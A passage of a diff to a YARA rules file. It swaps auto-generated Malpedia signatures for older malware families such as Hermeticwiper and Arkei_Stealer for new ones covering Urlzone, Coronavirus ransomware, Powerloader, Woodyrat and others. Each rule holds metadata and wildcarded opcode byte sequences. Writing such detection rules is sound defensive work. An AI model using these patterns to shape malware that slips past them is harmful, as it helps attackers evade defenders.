c20800 } + $sequence_4 = { 8b02 6a04 8b4804 03ca e8???????? } + $sequence_5 = { 6a1c e8???????? 59 85c0 7420 33c9 c7400410000000 } + $sequence_6 = { c1f805 83e21f 8b0c85f0974400 c1e206 8a441124 3245fe 247f } + $sequence_7 = { 51 8d55c8 8d4d8c e8???????? 83c410 84c0 7445 } + $sequence_8 = { 8bf9 50 e8???????? ff7518 8d45ec ff7514 8bcf } + $sequence_9 = { 03f0 8b442424 2bc1 99 f77c2418 47 3bf8 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <724992 } -rule MALPEDIA_Win_Hermeticwiper_Auto : FILE +rule MALPEDIA_Win_Urlzone_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ea8155d0-2aad-5127-b709-49a3ac0a065b" + id = "73713fa1-9237-58d2-8cc2-5acf9c265fc9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwiper" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hermeticwiper_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.urlzone_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "152c562a196a1884f9736d7ace893f74c52047d602608c8f019348b6a2233130" + logic_hash = "4cce61429410ef9f511dc19a60899f126670164d7c8bb8ef8edba2014cda32d1" score = 75 quality = 75 tags = "FILE" @@ -180432,32 +183227,32 @@ rule MALPEDIA_Win_Hermeticwiper_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b9???????? 8bc7 6690 668b10 663b11 751e 6685d2 } - $sequence_1 = { 8bf8 85ff 7404 3bfe 750b 33c0 } - $sequence_2 = { 55 8bec 8b4508 ff30 ff15???????? 6803000280 } - $sequence_3 = { 8b0d???????? 83e802 7408 83e801 751b 8b7e08 } - $sequence_4 = { 8b75f8 13550c 6a00 6a00 52 50 56 } - $sequence_5 = { 33f6 660fd645dc 33ff 8975f4 50 0f1145bc } - $sequence_6 = { d3e0 8b4dfc 0facd605 c1ea05 8504b1 754e 8b4d14 } - $sequence_7 = { 7509 3b75d8 7504 8bc2 eb0f 3bcb } - $sequence_8 = { c20c00 813f46494c45 75d4 f6471601 74ce 0fb77714 } - $sequence_9 = { ebba f7d0 23c6 8b75e0 89048e 41 } + $sequence_0 = { 7c32 80f839 7f05 80e830 eb22 } + $sequence_1 = { 80fc39 7f05 80ec30 eb22 } + $sequence_2 = { 7f05 80ec30 eb22 80fc41 7c54 } + $sequence_3 = { 80c00a eb10 80f861 7c11 80f866 } + $sequence_4 = { 5f 5e c3 57 51 89c7 } + $sequence_5 = { 80c40a eb10 80fc61 7c42 80f866 7f3d } + $sequence_6 = { 7f0c 80e861 80c00a c0e004 08e0 } + $sequence_7 = { 80f841 7c23 80f846 7f08 } + $sequence_8 = { 80f839 7f05 80e830 eb22 80f841 7c23 } + $sequence_9 = { 80ec30 eb22 80fc41 7c54 } condition: - 7 of them and filesize <247808 + 7 of them and filesize <704512 } -rule MALPEDIA_Win_Evilbunny_Auto : FILE +rule MALPEDIA_Win_Coronavirus_Ransomware_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2b83805d-7841-5694-8ab4-bb4f9f22ae07" + id = "855b633b-3844-51b6-884b-ae39212160b9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.evilbunny_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coronavirus_ransomware" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.coronavirus_ransomware_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "7c88ed9ce9cea56ac78c56ce0f41ba384f06b92b5a02fe2a2de304167eb32f00" + logic_hash = "cdd2b8f03fb9e73cf8c1c825b178f3065340bed6f25c08a712318c114ae54239" score = 75 quality = 75 tags = "FILE" @@ -180471,32 +183266,32 @@ rule MALPEDIA_Win_Evilbunny_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4dec 8b5104 8b45ec 8b4804 8b12 8bf4 51 } - $sequence_1 = { eb09 8b450c 8b80b0d91a00 3bf0 7e44 83ee07 eb3f } - $sequence_2 = { c1e104 8b5508 8b4220 8d4c08f0 8b5508 894a1c 8b4508 } - $sequence_3 = { 8b4df8 51 e8???????? 83c404 83c028 50 6a00 } - $sequence_4 = { e8???????? 83c40c 8b55f8 8b4204 50 68???????? 8b4d08 } - $sequence_5 = { e8???????? 83c40c 837dd808 7308 8b45d8 89458c eb07 } - $sequence_6 = { c1ea0a 33c2 038558ffffff 8b8d38ffffff c1e907 8b9538ffffff c1e219 } - $sequence_7 = { e8???????? 034508 50 e8???????? 83c40c 8b45f4 50 } - $sequence_8 = { c7000b000000 e9???????? 8b4d0c 8b5108 52 6a00 6a05 } - $sequence_9 = { 8b5598 8b45f8 8902 8b4598 52 8bcd 50 } + $sequence_0 = { 8d9b00000000 0fb708 66890c02 83c002 6685c9 75f1 8d8dec7effff } + $sequence_1 = { 894dd8 837e0400 8b5608 c745dc00000000 8955e0 750a 8b45cc } + $sequence_2 = { 50 ff15???????? 85c0 7420 b8???????? e8???????? 50 } + $sequence_3 = { 68fe1f0000 52 8d859e9fffff 50 e8???????? 33c9 } + $sequence_4 = { 83c002 50 52 68???????? 8d8500c0ffff } + $sequence_5 = { 53 e8???????? 83c410 85ff 743b 8d4900 803c1fc3 } + $sequence_6 = { ff15???????? 8b15???????? a1???????? 83c418 52 6a01 50 } + $sequence_7 = { 8b55d0 880417 8b45c8 50 ff15???????? 56 ff15???????? } + $sequence_8 = { ffd6 a3???????? eb0a 53 } + $sequence_9 = { ff15???????? 85c0 7407 ffd0 a3???????? be???????? e8???????? } condition: - 7 of them and filesize <1695744 + 7 of them and filesize <235520 } -rule MALPEDIA_Win_Crutch_Auto : FILE +rule MALPEDIA_Win_Ketrum_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1c62c9a2-5abd-50e0-9062-2bd78d3ac79d" + id = "675a5c68-35f7-5e7a-83cc-0627e32f2bf0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crutch_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ketrum_auto.yar#L1-L174" license_url = "N/A" - logic_hash = "af046e99ef1615cf66ae4969fa3fcc0ac2b09e87e76d784694e80263151a794f" + logic_hash = "b179771de79024de54f910e3eea2ec187acafed93fd395a9caebde5421ab28f1" score = 75 quality = 75 tags = "FILE" @@ -180510,34 +183305,40 @@ rule MALPEDIA_Win_Crutch_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7536 8b8740030000 f7404000c00000 51 740f 8b4e6c 51 } - $sequence_1 = { 8b442430 85c0 742b 8b942488000000 8b8c2484000000 52 8b54243c } - $sequence_2 = { 8b01 50 ff30 51 ff32 8bcb e8???????? } - $sequence_3 = { 50 8d4ddc e8???????? eb3a 8dbd1cffffff 8d3cd7 8d8514ffffff } - $sequence_4 = { 8b6c2408 7426 8b03 50 ff15???????? 8b8efc040000 51 } - $sequence_5 = { 0f84f9000000 b9???????? 8bc6 8d642400 8a10 3a11 751a } - $sequence_6 = { 81c2cc000000 89542408 8b54240c 89542404 e9???????? 81f9244e0000 } - $sequence_7 = { 7506 8b7c2428 eb4a 41 51 ff15???????? 8bf8 } - $sequence_8 = { b823000000 5e c3 8d471f c1e004 8bcf c1e104 } - $sequence_9 = { 8bf1 8a02 8806 8d4e18 8b4208 894608 8b420c } + $sequence_0 = { 83e13f 5f 3bc8 7203 } + $sequence_1 = { 8d85fcebffff 50 8d85fcd3ffff 68???????? 50 ffd7 } + $sequence_2 = { ff15???????? ffb5f0cbffff ff15???????? ffb5e8cbffff ffb5f4cbffff } + $sequence_3 = { ab ab ab ab 68???????? 6a15 bf???????? } + $sequence_4 = { e8???????? 59 85db 7e15 57 8b7d08 2bfe } + $sequence_5 = { 33c0 0fb7f0 8bc6 c1e610 ba???????? } + $sequence_6 = { 7434 b9???????? 8bc1 8d7001 8a10 40 } + $sequence_7 = { 85c0 7404 33c0 eb5e 6880000000 56 } + $sequence_8 = { 397010 7699 837b1408 7204 8b13 eb02 } + $sequence_9 = { 8a4c181c 8888b0f74100 40 ebe9 33c0 8945e4 } + $sequence_10 = { 6a04 8d8520efffff 50 6a1f 57 } + $sequence_11 = { 8b8da4fdffff 2bc1 2bc6 50 03ce 51 } + $sequence_12 = { 3bf9 732c 8b16 3bd7 7726 8bc7 2bc2 } + $sequence_13 = { 8365fc00 83c074 50 8b4508 e8???????? } + $sequence_14 = { 89a570feffff 6a0f 5f 897e14 895e10 } + $sequence_15 = { 33ff 8d759c e8???????? 33c0 40 e8???????? } condition: - 7 of them and filesize <1067008 + 7 of them and filesize <4599808 } -rule MALPEDIA_Win_Skipper_Auto : FILE +rule MALPEDIA_Win_Stinger_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4df8b68e-8938-5eb7-bba0-86905918e37c" + id = "03e2d1ca-b846-5787-b683-28feb74dae3e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.skipper_auto.yar#L1-L431" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stinger_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "dd8f2a613ae1336f9183e3a024858c9c0abef8aafde3712e59fe4ab047db7609" + logic_hash = "64d2d0bb18e9f4889ac80d1e49c5ab473a950fa26645e6f561f71db4e8eb08f3" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -180549,67 +183350,32 @@ rule MALPEDIA_Win_Skipper_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 6a00 6a03 68???????? 68???????? 6a50 } - $sequence_1 = { 59 5d c3 55 8bec 33c0 50 } - $sequence_2 = { e8???????? 6804010000 e8???????? 6804010000 8bf8 } - $sequence_3 = { ff15???????? 6a00 6a00 6a00 6a00 68???????? 68???????? } - $sequence_4 = { e8???????? 6a04 e8???????? 8bf8 57 6a04 68???????? } - $sequence_5 = { 0fb6c3 03c8 81e1ff000080 7908 49 81c900ffffff 41 } - $sequence_6 = { 8b4d08 0fb68405fcfeffff 320439 47 8847ff 4e 0f8568ffffff } - $sequence_7 = { 7c0e 0fba25????????01 0f824a0e0000 57 8bf9 83fa04 7231 } - $sequence_8 = { e8???????? 83c404 6a00 6a64 52 50 } - $sequence_9 = { 8a85effeffff 888415f0feffff e9???????? c785dcfeffff00000000 } - $sequence_10 = { 898ddcfeffff 8b95dcfeffff 3b5514 0f8dcf000000 8b45f8 } - $sequence_11 = { 0fb6d2 8a8415f0feffff 8885eefeffff 8b4d10 038ddcfeffff 0fbe11 } - $sequence_12 = { c1e81f 03d0 418bc1 8d1492 } - $sequence_13 = { 0fb602 418800 44880a 410fb610 4103d1 } - $sequence_14 = { 81e2ff000080 7908 4a 81ca00ffffff 42 0fb6d2 8a8415f0feffff } - $sequence_15 = { 51 6a0b 68???????? 8b15???????? 52 68???????? e8???????? } - $sequence_16 = { 0fb645f8 8a8c15f0feffff 888c05f0feffff 0fb655fc 8a85effeffff } - $sequence_17 = { 33c9 4963e9 498bf8 488d1424 448bd1 8bc1 0f1f840000000000 } - $sequence_18 = { 4181c800ffffff 41ffc0 410fb6c0 488d1424 41ffc1 4803d0 48ffc3 } - $sequence_19 = { 81c900ffffff ffc1 4863c1 0fb61404 4403d2 4181e2ff000080 } - $sequence_20 = { 0fb6c2 49ffc3 0fb61404 4232541fff } - $sequence_21 = { 48896c2410 4889742418 48897c2420 4156 4881ec10010000 488b05???????? 4833c4 } - $sequence_22 = { 8b85e0feffff 83c001 8985e0feffff 81bde0feffff00010000 } - $sequence_23 = { 4232541fff 418853ff 48ffcb 0f8575ffffff } - $sequence_24 = { 81ec24010000 a1???????? 33c5 8945f4 c745f800000000 } - $sequence_25 = { 3d02010000 7513 8b4d08 e8???????? 68e8030000 ff15???????? } - $sequence_26 = { 7528 48833d????????00 741e 488d0de59b0000 e8???????? 85c0 740e } - $sequence_27 = { 895704 66a1???????? 66894708 8a0d???????? 884f0a e8???????? 0fb6d0 } - $sequence_28 = { 85d2 740c c785d4feffff3a040000 eb0a c785d4feffffffff1f00 } - $sequence_29 = { 68???????? 68???????? 8d4d20 0f434d20 68bb010000 51 50 } - $sequence_30 = { ffb5b0faffff e9???????? 8d8580faffff 50 6a00 ffb590faffff } - $sequence_31 = { 33c0 e9???????? 8975e4 33c0 39b8b8a62300 0f8491000000 } - $sequence_32 = { 488bc3 488d15cfa30000 48c1f805 83e11f 488b04c2 486bc958 } - $sequence_33 = { 48ffc8 90 80780100 488d4001 75f6 } - $sequence_34 = { ff15???????? 41b900800000 41b804010000 488bd3 488bcf ff15???????? } - $sequence_35 = { b81a000000 eb23 488d0da39a0000 48890c03 4883c130 } - $sequence_36 = { 8b0c85606d4100 c1e206 8a441124 3245fe 247f 30441124 8b37 } - $sequence_37 = { 8b7508 8d34f570a02300 391e 7404 } - $sequence_38 = { e8???????? 488db328010000 488d7b28 bd06000000 488d051dad0000 483947f0 } - $sequence_39 = { e8???????? 59 8945e4 8b7508 c7465cd8812300 33ff 47 } - $sequence_40 = { 8bff 55 8bec 8b4508 ff34c570a02300 } - $sequence_41 = { 8a80b4a62300 08443b1d 0fb64601 47 3bf8 } - $sequence_42 = { 488d1d24a50000 8bef 488b33 4885f6 } - $sequence_43 = { a3???????? a1???????? c705????????66162300 8935???????? a3???????? ff15???????? } - $sequence_44 = { 488d05a59a0000 740f 3908 740e 4883c010 4883780800 } + $sequence_0 = { 8bec 81ec10000000 6804000080 6a00 8b5d08 } + $sequence_1 = { f6c441 0f854d010000 8b45f4 50 8b5d08 ff33 } + $sequence_2 = { 895df8 8965f4 ff75fc ff15???????? 90 90 } + $sequence_3 = { 6806000000 e8???????? 83c404 e9???????? 8be5 5d c21000 } + $sequence_4 = { e9???????? 68???????? 8b5d0c ff33 e8???????? 83c408 } + $sequence_5 = { a1???????? 85c0 891c85ecbe4000 750a } + $sequence_6 = { 6806000000 e8???????? 83c404 a3???????? 8965f8 68???????? } + $sequence_7 = { ff75fc 6802000000 bb94020000 e8???????? 83c41c 8945e8 } + $sequence_8 = { 6800000000 6800000000 68???????? ff35???????? 6800000000 ff15???????? 90 } + $sequence_9 = { 8b5d08 ff33 b902000000 e8???????? 83c408 8945f0 ff750c } condition: - 7 of them and filesize <262144 + 7 of them and filesize <197096 } -rule MALPEDIA_Win_Mm_Core_Auto : FILE +rule MALPEDIA_Win_Alpc_Lpe_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d45aa5c3-0724-55a7-87e0-2c03f652362f" + id = "1d3d4f14-881f-5a73-b345-a76e12b3dfd0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mm_core_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alpc_lpe_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "3ca1e6eabacd07d91480b5599e1196a1b257af6133657fffc185261c4367958e" + logic_hash = "21b1493d78b90781647fb0ea2e97a709ccc21e177ddf748dd3e2118819bbc37e" score = 75 quality = 75 tags = "FILE" @@ -180623,32 +183389,32 @@ rule MALPEDIA_Win_Mm_Core_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7458 57 8b7c240c 85ff 744e 6a40 6800300000 } - $sequence_1 = { c1f805 8bf7 83e61f c1e606 03348540400110 c745e401000000 } - $sequence_2 = { 8b45fc ff34c5e41c0110 53 57 e8???????? 83c40c 85c0 } - $sequence_3 = { 85f6 0f848d000000 8b0e 85c9 7442 8b5608 } - $sequence_4 = { 8b442424 8b4c242c 8938 8931 } - $sequence_5 = { 8955d4 8b45d4 8b4814 894ddc } - $sequence_6 = { 8d4c244c 51 55 55 68???????? 68???????? } - $sequence_7 = { 57 52 89842480000000 898c2484000000 89bc2488000000 e8???????? 83c40c } - $sequence_8 = { e8???????? bb???????? 8d742434 e8???????? 8d9c24a8050000 8d742428 e8???????? } - $sequence_9 = { 8b4dc4 0fb611 0355fc 8955fc 8b45c4 } + $sequence_0 = { ba31000000 4c8d05b3a10000 448bcb 482bd6 e8???????? 4883c603 881f } + $sequence_1 = { 4533c0 48c7c102000080 4889442420 ff15???????? ff15???????? 488b4c2448 } + $sequence_2 = { 57 4881ec58010000 488d6c2420 488bfc b956000000 } + $sequence_3 = { 488b8d00010000 e8???????? 488b8dd8000000 488bd1 488bc8 e8???????? } + $sequence_4 = { e8???????? 488d0da1af0000 e8???????? 488d0d85af0000 } + $sequence_5 = { 488bc8 e8???????? 488b5508 488b8d00010000 } + $sequence_6 = { e8???????? 488d0dc1ad0000 e8???????? 488d0da5ad0000 } + $sequence_7 = { 488d6c2430 488bfc b98a000000 b8cccccccc f3ab 488b8c2448020000 488b05???????? } + $sequence_8 = { 488d1deb7e0000 4184c0 7539 410bc0 488d542458 488d0ddfd30000 8905???????? } + $sequence_9 = { 488b4c2438 488d442430 4889442428 4c8d4c2434 488d442440 4533c0 488d1548830000 } condition: - 7 of them and filesize <319488 + 7 of them and filesize <540672 } -rule MALPEDIA_Win_Arkei_Stealer_Auto : FILE +rule MALPEDIA_Win_Powerloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d30a73fa-e439-581b-821f-0f94e7403477" + id = "7f4f5f46-fc37-546a-a6e8-709a0ba38743" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.arkei_stealer_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.powerloader_auto.yar#L1-L108" license_url = "N/A" - logic_hash = "9f5b37522725bf35fb4c723079a0799c573d27f50c2c2a0cc7a8a66eafb6f502" + logic_hash = "793f3dbd327274c0d84943d43e404acbb8cb72be0435ee1a3f9e0ada37088a0f" score = 75 quality = 75 tags = "FILE" @@ -180662,32 +183428,32 @@ rule MALPEDIA_Win_Arkei_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d55c4 52 6a18 50 ff15???????? 85c0 } - $sequence_1 = { 8be5 5d c3 50 8b45e8 } - $sequence_2 = { 894614 897e24 ff15???????? 8bd8 3bdf 0f84e3feffff } - $sequence_3 = { 8bf0 ffd3 8bd8 53 56 } - $sequence_4 = { 56 53 52 57 50 51 ff15???????? } - $sequence_5 = { 8b00 50 ff15???????? 83f8ff 740b a810 7507 } - $sequence_6 = { 85c0 0f8458feffff 8b4e20 6a00 8d45e4 50 8d148d28000000 } - $sequence_7 = { 8bf0 c70628000000 8b4dc8 894e04 8b55cc 895608 668b45d4 } - $sequence_8 = { 8b7614 6a00 8d45e4 50 56 } - $sequence_9 = { 56 894590 ff15???????? 8bf8 897d94 83ffff } + $sequence_0 = { e8???????? eb22 33c9 66666666660f1f840000000000 0fb6840c30010000 } + $sequence_1 = { 8bf2 32db e8???????? 3bc7 7349 } + $sequence_2 = { e8???????? 0fb6d8 84c0 7514 } + $sequence_3 = { e8???????? 0fb6d8 84c0 7514 ff15???????? } + $sequence_4 = { 33d2 c605????????00 e8???????? 0fb6c3 } + $sequence_5 = { 32db e8???????? 3bc7 7349 } + $sequence_6 = { e8???????? eb22 33c9 66666666660f1f840000000000 } + $sequence_7 = { e8???????? 8b7c2430 85ed 740d } + $sequence_8 = { ff15???????? 83f81f 7323 ff15???????? } + $sequence_9 = { ff15???????? 83f803 7405 83f802 7530 } condition: - 7 of them and filesize <1744896 + 7 of them and filesize <155648 } -rule MALPEDIA_Win_Chir_Auto : FILE +rule MALPEDIA_Win_Billgates_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "18ccfa9f-30e1-5e52-b265-5cee479b1cb5" + id = "2ccab9f1-e7c2-5897-af43-0d6c30857357" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chir_auto.yar#L1-L115" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.billgates_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "3243cfbae6092a474cd7d4359f5703dd14295b3f14d9c12875310667b98d1cdf" + logic_hash = "e0a8f89c836a13df9d06b620bc16eb3744a9d5b82a5ea28cb550060f6d08f1fc" score = 75 quality = 75 tags = "FILE" @@ -180701,32 +183467,32 @@ rule MALPEDIA_Win_Chir_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 47 8811 3bf8 72e7 } - $sequence_1 = { 8d4c3df0 8a11 80f2fc 80c202 } - $sequence_2 = { e8???????? 48 59 8bcb 7419 } - $sequence_3 = { 5e 7419 8d4c35f8 8a11 80f2fc } - $sequence_4 = { 8d45f0 50 c745f021352432 c745f451173300 e8???????? 48 } - $sequence_5 = { c745f451173300 e8???????? 48 59 8bfb } - $sequence_6 = { 8d4c35f0 8a11 80f2fc 80c202 80f201 } - $sequence_7 = { 8a19 80f3fc 80c302 80f301 80c303 42 } - $sequence_8 = { 7415 8d4c15f8 8a01 34fc } - $sequence_9 = { 8a11 80f2fc 80c202 80f201 80c203 46 8811 } + $sequence_0 = { 3c11 7408 3c22 7404 3c30 } + $sequence_1 = { 8d8809f9ffff b8c94216b2 f7e9 03d1 } + $sequence_2 = { 3c58 7507 b802000000 eb02 } + $sequence_3 = { 740c 3c11 7408 3c22 7404 3c30 } + $sequence_4 = { 3c10 740c 3c11 7408 } + $sequence_5 = { 83f8ff 750c ff15???????? 8bd8 f7db } + $sequence_6 = { 3c11 7408 3c22 7404 } + $sequence_7 = { ff15???????? 83f8ff 7508 ff15???????? f7d8 85c0 } + $sequence_8 = { 3c10 740c 3c11 7408 3c22 } + $sequence_9 = { 3c10 740c 3c11 7408 3c22 7404 } condition: - 7 of them and filesize <286720 + 7 of them and filesize <801792 } -rule MALPEDIA_Win_Stormwind_Auto : FILE +rule MALPEDIA_Win_Avrecon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "134843ba-afb3-5108-9e28-7ec5026e872c" + id = "554ca169-95af-5a89-9a56-ddcba6897449" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stormwind" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stormwind_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avrecon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.avrecon_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "81578edc87d2c38ca6c94ce63cf22ed064b72d5bc6a7c525985af57574ba5c73" + logic_hash = "9c9411fb28d3d6162f9e1c850b8f8c9dc5dad1f470c391d983f628f3870dd7ec" score = 75 quality = 75 tags = "FILE" @@ -180740,32 +183506,32 @@ rule MALPEDIA_Win_Stormwind_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 83c404 8bf7 3b3b 75e2 } - $sequence_1 = { 83e4f8 81ec1c010000 53 8b5d10 56 57 8b7d0c } - $sequence_2 = { e8???????? 83ec0c c745fc00000000 8d4e04 e8???????? 85c0 8b06 } - $sequence_3 = { 50 ff7604 56 e8???????? 894604 c745d801000000 8b4804 } - $sequence_4 = { 59 8b7d08 33db 391cfd88e40410 755c 6a18 e8???????? } - $sequence_5 = { 83fa05 7509 8b852cfdffff 89470c 6bc20c 57 ff90c04e0410 } - $sequence_6 = { 8d4de4 e8???????? 68???????? 8d45e4 c745e4740c0410 50 e8???????? } - $sequence_7 = { f7fe 57 8bc2 99 } - $sequence_8 = { c74508???????? 50 8d4de4 e8???????? 68???????? 8d45e4 c745e4740c0410 } - $sequence_9 = { 8975d4 68b8020000 c645fc01 e8???????? } + $sequence_0 = { 56 e8???????? 85c0 0f8577020000 8d8584fbffff 50 56 } + $sequence_1 = { 89b5f0fdffff 899decfdffff 89b5f4feffff 899df0feffff ff15???????? 8945fc } + $sequence_2 = { 56 47 e8???????? 0fb7f0 663bf3 0f869b030000 } + $sequence_3 = { e8???????? 53 ff15???????? 8b35???????? 8d4554 50 0fb705???????? } + $sequence_4 = { e8???????? 83c410 5e c3 55 8bec 81ec04010000 } + $sequence_5 = { 50 6880000000 57 ff7508 ffd6 6a04 8d45f8 } + $sequence_6 = { 49 7524 50 a3???????? ff15???????? e8???????? } + $sequence_7 = { e8???????? 56 6a08 8d45d8 50 ff7508 c645d800 } + $sequence_8 = { 56 8bf8 ff15???????? 668bc7 5f 5e } + $sequence_9 = { 50 8d85c0f7ffff 50 e8???????? 8d85a8f7ffff 50 894534 } condition: - 7 of them and filesize <741376 + 7 of them and filesize <360448 } -rule MALPEDIA_Win_Lowball_Auto : FILE +rule MALPEDIA_Win_Woodyrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5424f572-46b4-58bc-b4a0-f5f116f9edc3" + id = "ce77dd1e-7a7f-526f-b26a-f53840a84ce1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lowball_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woodyrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.woodyrat_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "40672e1fab5ab37bc1a93541afc7340032670ae9b7325b888c89c49deec74a07" + logic_hash = "f0e3660df6e09cfccf9351d956d7545670538be69e20bfd57639d1e54207defb" score = 75 quality = 75 tags = "FILE" @@ -180779,32 +183545,32 @@ rule MALPEDIA_Win_Lowball_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f8436010000 8b942430060000 33c9 85d2 740c 8bfa } - $sequence_1 = { ff54242c 5f 5e 5d 33c0 } - $sequence_2 = { 8d4f01 51 e8???????? 56 8bd8 ff15???????? } - $sequence_3 = { 68???????? f3a4 6a00 ff54242c 6810270000 ff15???????? bf???????? } - $sequence_4 = { 85ff 897c240c 0f848c000000 8b942420020000 55 } - $sequence_5 = { c1e902 f3a5 8bcb 8d84244c0d0000 83e103 50 } - $sequence_6 = { 83c410 85c0 752d 68b80b0000 ffd3 8d8c24400a0000 8d94241c010000 } - $sequence_7 = { 8bc1 8bf7 8bfa 8d942434070000 c1e902 f3a5 8bc8 } - $sequence_8 = { ff15???????? 83c404 89442410 b905000000 be???????? } - $sequence_9 = { 6a00 6a00 68bb010000 51 56 } + $sequence_0 = { 8b75ec 8985a4ebffff ffb5bcebffff e8???????? 8b7de4 83c404 837de800 } + $sequence_1 = { 8d4e4c 54 6a00 e8???????? 8bc8 e8???????? 8d4dd8 } + $sequence_2 = { 8d4710 50 8d45cc 50 e8???????? 84c0 7403 } + $sequence_3 = { e8???????? c645fc03 8b55cc 83fa10 722c 8b4db8 42 } + $sequence_4 = { 8b4328 8bd8 3bfb 742d 8b0f 8b01 ff5008 } + $sequence_5 = { 8bc8 83781410 7202 8b08 83781004 753b 8b01 } + $sequence_6 = { 83c408 8d4508 6a00 84db 7428 837d1c08 6800000002 } + $sequence_7 = { 50 e8???????? 8b7d80 83c404 e9???????? c645fc00 } + $sequence_8 = { 7607 be55555515 eb07 03f1 3bf2 0f42f2 } 